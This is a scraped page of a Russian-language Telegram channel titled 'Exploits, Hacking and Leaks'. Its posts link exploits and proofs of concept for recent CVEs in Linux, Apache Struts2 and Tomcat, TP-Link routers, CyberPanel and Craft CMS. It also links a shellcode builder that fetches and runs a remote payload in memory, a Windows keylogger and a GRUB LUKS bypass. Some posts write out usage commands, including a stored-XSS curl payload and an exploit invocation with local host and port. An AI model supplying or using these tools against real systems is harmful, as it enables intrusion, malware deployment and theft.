Proxy Bar – Telegram
Proxy Bar
19.5K subscribers
1.29K photos
79 videos
664 files
1.32K links
Exploits, Hacking and Leaks

Чат группы - https://news.1rj.ru/str/chat_proxy_bar

Связь с администрацией и реклама:
@NULL_vm

Поддержать проект:
BTC bc1qmrt229eghjyj9wqa7nmr9j8zuq6khz6km2pker
Download Telegram
CVE-2024-1086 Linux LPE
*
Exploit
👍12🔥3
Apache Struts2 CVE-2024-53677
*
POC+WriteUp
🔥14
Svartalfheim
*
Шелкодесы))
Stage 0 Shellcode to Download a Remote Payload and Execute it in Memory
*
Link
Usage
python3 builder.py -u 10.10.100.121 -u /path/to/shellcode.bin -p 80
python3 builder.py -u 10.10.100.121 -u /path/to/shellcode.bin -p 443 -s
🔥11👍6
Крутой разбор !!!
*
OtterRoot: Netfilter Universal Root 1-day
👍14
👍16🔥11
This media is not supported in your browser
VIEW IN TELEGRAM
CVE-2024-50379 Apache Tomcat
*
Проблема с состоянием гонки времени проверки времени использования (TOCTOU), которое может привести к удаленному выполнению кода (RCE), особенно в файловых системах, нечувствительных к регистру, таких как Windows.
*
Exploitation and POC
👍15🔥5
CVE-2024-53375
*
TP-Link Archer AXE75 Authenticated Command Injection
*
Exploit
👍5😱5🔥3
CVE-2024-53376
*
CyberPanel ( versions < 2.3.8 ) Authenticated OS Command Injection
*
WriteUP
*
exploit
🔥5
CVE-2024-10793
*
Плагин WP Activity Log для WordPress
Хранимая XSS через параметр user_id во всех версиях до 5.2.1
curl -X POST 'http://example.com/wp-admin/admin-ajax.php' \
-d 'action=destroy-sessions&user_id=<noscript>alert("XSS found 1")</noscript>'
🔥13😱5👍2
👍9🔥2
Отличное
👍39🔥19😱3
CVE-2024-49194
*
Databricks JDBC Attack via JAAS
*
WriteUP + POC
🔥6👍2
CVE-2024-56145: Craft CMS
*
RCE без аутентификации
НО, только если включен параметр конфигурации PHP `register_argc_argv`
*
Exploit Command:
python exploit.py exploit -u <TARGET_URL> -lh <LOCAL_HOST> -lp <LOCAL_PORT> -px <PAYLOAD_TYPE>

*
EXploit
👍8😱5
This media is not supported in your browser
VIEW IN TELEGRAM
В сеть слили ранее не изданную альтернативную концовку фильма Хакеры 1995 года

#friday
👍21😱2
Черт, это действительно смешная пятничная история)))
*
GRUB LUKS Bypass and Dump
👍19🔥7😱1
tomcat CVE-2024-50379/CVE-2024-56337
*
Прокачанная версия
👍10🔥2😱2
Windows Keylogger
использующий SetWindowsHookEx
Link
👍15🔥8😱3
Отлично ))))
onedrive.exe загружает подделанный sppc.dll, который, в свою очередь, загружает onedrive.dll и расшифровывает его с помощью системной функции RC4033 и жестко запрограммированного ключа. Расшифрованная полезная нагрузка, похоже, связана с havoc
🔥20😱15
SLUB Internals for Exploit Developers
*
Linux Security Summit, Vienna
Sep 16th, 2024
*
PDF
🔥9👍7